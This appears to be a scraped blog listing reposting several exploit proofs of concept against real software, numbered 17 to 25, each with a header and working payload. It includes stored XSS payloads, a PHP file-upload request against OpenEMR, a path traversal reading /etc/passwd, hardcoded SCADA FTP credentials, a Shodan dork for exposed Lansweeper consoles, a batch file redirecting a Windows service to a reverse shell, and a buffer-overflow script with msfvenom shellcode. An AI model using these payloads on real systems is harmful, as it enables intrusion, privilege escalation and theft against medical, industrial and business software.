    # Exploit Title: Code Blocks 20.03 - Denial Of Service (PoC) # Vendor Homepage: http://www.codeblocks.org/ # Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/20.03/Windows/codeblocks-20.03-setup.exe/download # Exploit Author: Paras Bhatia # Discovery Date: 2020-06-23 # Vulnerable Software: Code Blocks # Version: 20.03 # Vulnerability Type: Denial of Service (DoS) # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) #Steps to Produce the Crash: # 1.- Run python code: CodeBlocksCrash.py # 2.- Copy content to clipboard # 3.- Open "codeblocks.exe" # 4.- In the "Management" section on left hand side, Click on "FSymbols" tab. # 5.- Select "Active project's symbols" from drop down "View:" menu. # 6.- Paste ClipBoard into the "Search:" field. # 7.- Press Enter from keyboard. # 8.- Crashed. ################################################################################################################################################## #Python "CodeBlocksCrash.py" Code: f= open("CodeBlocksCrash.txt", "w") payload="\x41" * 5000 f.write(payload) f.close()
  17. HireHackking

    Lansweeper 7.2 - Incorrect Access Control

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Lansweeper 7.2 - Incorrect Access Control # SHODAN DORK : title:"Lansweeper - Login" # Date: 2020-06-14 # Exploit Author: Amel BOUZIANE-LEBLOND # Vendor Homepage: https://www.lansweeper.com/ # Software Link: https://www.lansweeper.com # Version: 6.0.x through 7.2.x # Tested on: Windows # CVE : CVE-2020-14011 ### Title: Incorrect Access Control. ### Category: Exploit ### Severity: Critical ### Description: Lansweeper 6.0.x through 7.2.x has a default installation in which the admin password is configured for the admin account, unless "Built-in admin" is manually unchecked. This allows command execution via the Add New Package and Scheduled Deployments features. ### Other observation: Hi, This issue is kind of critical, By using shodan with this filter title:"Lansweeper - Login" We will find some Lansweeper with default installation on it ### Details: The Lansweeper application is agentless network inventory software that can be used for IT asset management. It uses the ASP.NET technology on its web application. ### Analysis: When you install Lansweeper 6.0 or a more recent Lansweeper release and access the web console for the first time, you are presented with a First Run Wizard, which allows you to set up scanning and configure some basic options. Any subsequent times you access the console, you are presented with a login screen. By default, everyone in your network can access all of Lansweeper's features and menus simply by browsing to the web console URL and hitting the Built-in Admin button. ### Suggested mitigation: restrict access to the console and configure what users can see or do once they've been granted access. You assign a built-in or custom user role, a set of permissions, to user groups or individual user accounts. A user's role determines what the user can see or do within the console.. ### Impact/Risk: Remote code execution can expose the organization to unauthorized access of data and programs, fraud. -- Amel BOUZIANE-LEBLOND
  18. HireHackking

    BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit title: BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting # Exploit Author: William Summerhill # Date: 2020-06-22 # Vendor homepage: https://www.globalradar.com/ # Tested on: Window # CVE-2020-14943 # Description: The "Firstname" and "Lastname" parameters in Global RADAR BSA Radar 1.6.7234.X # are vulnerable to a stored Cross-Site Scripting (XSS) via the Update User Profile feature # (in the top-right of the application). # Proof of Concept: Using the "update user profile" feature in the top-right of the application while logged in, a malicious user can inject malicious, unencoded scripts, such as "<script>alert(1)</script>", into the Firstname and Lastname parameters of a user account. This stored XSS will execute on nearly every application page as these parameters are always present while logged in. This attack can be further leveraged by utilizing an existing authorization bypass exploit (CVE-2020-14944) to inject stored XSS payloads into these parameters for arbitrary existing user accounts. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14943
  19. HireHackking

    OpenEMR 5.0.1 - 'controller' Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenEMR 5.0.1 - 'controller' Remote Code Execution # Date: 2020-06-22 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://www.open-emr.org/wiki/index.php/OpenEMR_Downloads # Version: v5.0.1 # Tested on: Linux # Link: https://github.com/EmreOvunc/OpenEMR_Vulnerabilities # PoC To exploit vulnerability, someone could use 'http://[HOST]/controller.php?document&upload&patient_id=00&parent_id=4&' post request to upload malicious php codes. POST /openemr-5.0.1/controller.php?document&upload&patient_id=00&parent_id=4& HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://172.16.155.140/openemr-5.0.1/controller.php?document&upload&patient_id=00&parent_id=4& Content-Type: multipart/form-data; boundary=---------------------------141194333536146869123947219434 Content-Length: 842 Origin: http://172.16.155.140 DNT: 1 Connection: close Cookie: OpenEMR=t1lugo5qrbhv7mc2c3q9ricsnl; TreeMenuBranchStatus=objTreeMenu_1_node_1_9; PHPSESSID=dfhapc4v0bskt7pcpmc2j93agq; LS-VQGNEIWNPEBSNBWE=6rm848pgjj78hhecpb9roo8af1; YII_CSRF_TOKEN=OWYyM0lybGFtRF9wcHRkZ1lldF9WblhoVHlVNk5HRW3WMnZhghJHNtBjyIuALM94Ww3gltGLoeKETBSfevfbCw%3D%3D Upgrade-Insecure-Requests: 1 -----------------------------141194333536146869123947219434 Content-Disposition: form-data; name="MAX_FILE_SIZE" 64000000 -----------------------------141194333536146869123947219434 Content-Disposition: form-data; name="file[]"; filename="shell_info.php" Content-Type: text/php <?php phpinfo(); ?> -----------------------------141194333536146869123947219434 Content-Disposition: form-data; name="destination" -----------------------------141194333536146869123947219434 Content-Disposition: form-data; name="patient_id" 00 -----------------------------141194333536146869123947219434 Content-Disposition: form-data; name="category_id" 4 -----------------------------141194333536146869123947219434 Content-Disposition: form-data; name="process" true -----------------------------141194333536146869123947219434--
  20. HireHackking

    FHEM 6.0 - Local File Inclusion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: FHEM 6.0 - Local File Inclusion # Date: 2020-02-10 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: https://fhem.de/ # Software Link: https://fhem.de/#Download # Version: v6.0 # Tested on: Windows # Link: https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability # PoC To exploit vulnerability, someone could use 'http:// [HOST]/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text' request to get some informations from the target by changing "file" parameter. GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
  21. HireHackking

    mySCADA myPRO 7 - Hardcoded Credentials

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: mySCADA myPRO v7 Hardcoded Credentials # Date: 2018-07-02 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: http://myscada.org # Software Link: https://www.myscada.org/mypro/ # Version: v7.0.45 # Tested on: Windows/Linux # CVE-2018-11311 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11311 # https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password # PoC ftp [IP] 2121 username: myscada password: Vikuk63
  22. HireHackking

    Windscribe 1.83 - 'WindscribeService' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path # Date: 2020-06-26 # Exploit Author: Ethan Seow # Vendor Homepage: https://windscribe.com # Version: v1.83 Build 20 # Tested on: Microsoft Windows 10 Home 10.0.18363 Build 18363 #filename : exploit.bat #Code start @echo off sc config WindscribeService binPath="cmd /k {PATH TO REVERSE SHELL e.g. C:\Users\Public\payload.exe}" sc stop WindscribeService sc start WindscribeService echo Exploit success! SYSTEM reverse shell should be triggered :DDDDD pause #Code end
  23. HireHackking

    KiteService 1.2020.618.0 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: KiteService 1.2020.618.0 - Unquoted Service Path # Discovery by: PoisonSk # Discovery Date: 2020-06-23 # Vendor Homepage: https://www.kite.com/ # Software Link : https://www.kite.com/download/ # Tested Version: 1.2020.618.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Home Single 10.0.18363 N/D Compilación 18363 # Steps to discover unquoted Service Path: C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i "program " | findstr /i /v """ KiteService KiteService C:\Program Files\Kite\KiteService.exe Auto C:\Users>sc qc KiteService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: KiteService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : KiteService DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # Exploit: #A successful attempt would require the local attacker must insert an executable file in the path of the service. #Upon service restart or system reboot, the malicious code will be run with elevated privileges.
  24. HireHackking

    RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC) # Exploit Author: Paras Bhatia # Discovery Date: 2020-06-29 # Vulnerable Software: RM Downloader # Software Link Download: https://github.com/x00x00x00x00/RMDownloader_2.50.60/raw/master/RMDownloader.exe # Version: 2.50.60 2006.06.23 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) # Proof of Concept: # 1.- Run the python script, it will create a new file "RM_LCE.txt" # 2.- Copy the content of the new file 'RM_LCE.txt' to clipboard # 3.- Turn off DEP for RMDownloader.exe # 4.- Open 'RMDownloader.exe' # 5.- Go to 'Load' tab # 6.- Paste clipboard in 'Load' parameter # 7.- Click on button 'OK' # 8.- Two messageboxes will pop up, click OK # 9.- Calc.exe runs. ################################################################################################################################################# #Python "RM_LCE.py" Code: f= open("RM_LCE.txt", "w") junk="\x41" * 336 egg = "w00tw00t" # msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -b "\x0a\x0d\x00" buf = "" buf += "\xd9\xeb\xb8\xfa\x38\xad\x4f\xd9\x74\x24\xf4\x5a\x29" buf += "\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xee\xda" buf += "\x58\xb3\xe6\x99\xa3\x4c\xf6\xfd\x2a\xa9\xc7\x3d\x48" buf += "\xb9\x77\x8e\x1a\xef\x7b\x65\x4e\x04\x08\x0b\x47\x2b" buf += "\xb9\xa6\xb1\x02\x3a\x9a\x82\x05\xb8\xe1\xd6\xe5\x81" buf += "\x29\x2b\xe7\xc6\x54\xc6\xb5\x9f\x13\x75\x2a\x94\x6e" buf += "\x46\xc1\xe6\x7f\xce\x36\xbe\x7e\xff\xe8\xb5\xd8\xdf" buf += "\x0b\x1a\x51\x56\x14\x7f\x5c\x20\xaf\x4b\x2a\xb3\x79" buf += "\x82\xd3\x18\x44\x2b\x26\x60\x80\x8b\xd9\x17\xf8\xe8" buf += "\x64\x20\x3f\x93\xb2\xa5\xa4\x33\x30\x1d\x01\xc2\x95" buf += "\xf8\xc2\xc8\x52\x8e\x8d\xcc\x65\x43\xa6\xe8\xee\x62" buf += "\x69\x79\xb4\x40\xad\x22\x6e\xe8\xf4\x8e\xc1\x15\xe6" buf += "\x71\xbd\xb3\x6c\x9f\xaa\xc9\x2e\xf5\x2d\x5f\x55\xbb" buf += "\x2e\x5f\x56\xeb\x46\x6e\xdd\x64\x10\x6f\x34\xc1\xee" buf += "\x25\x15\x63\x67\xe0\xcf\x36\xea\x13\x3a\x74\x13\x90" buf += "\xcf\x04\xe0\x88\xa5\x01\xac\x0e\x55\x7b\xbd\xfa\x59" buf += "\x28\xbe\x2e\x3a\xaf\x2c\xb2\x93\x4a\xd5\x51\xec" nseh ="\xeb\x06\x90\x90" #1002C531 5B POP EBX #1002C532 58 POP EAX #1002C533 C3 RETN #C:\Program Files\RM Downloader\RDutility02.dll seh="\x31\xc5\x02\x10" nops="\x90" * 20 egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" egghunter += "\x77\x30\x30\x74" # this is the marker/tag: w00t egghunter += "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7" payload = junk + egg + buf + nseh + seh + nops + egghunter f.write(payload) f.close
  25. HireHackking

    Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2020-06-28 # Exploit Author: Anushree Priyadarshini # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link:https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Tested on: Windows 10 # CVE: CVE-2020-15599 Description: The form parameter 'user_firstname' and 'user_lastname' is vulnerable to stored cross site scripting Payload for 'user_firstname' : <script>alert(1)</script> Payload for 'user_lastname' : <script>alert(2)</script> POST /CMSsite-master/register.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.9,en-GB;q=0.8,en-CA;q=0.7,zh-CN;q=0.6,zh-HK;q=0.5,zh-SG;q=0.4,zh-TW;q=0.3,ja;q=0.2,ko;q=0.1 Accept-Encoding: gzip, deflate Referer: http://localhost/CMSsite-master/register.php Content-Type: application/x-www-form-urlencoded Content-Length: 190 Connection: close Cookie: PHPSESSID=491d4jir62vldd0u84knd1m1fi Upgrade-Insecure-Requests: 1 user_name=DemoUser&user_firstname=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&user_lastname=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&user_email=Hack%40gmail.com&user_password=1234&register=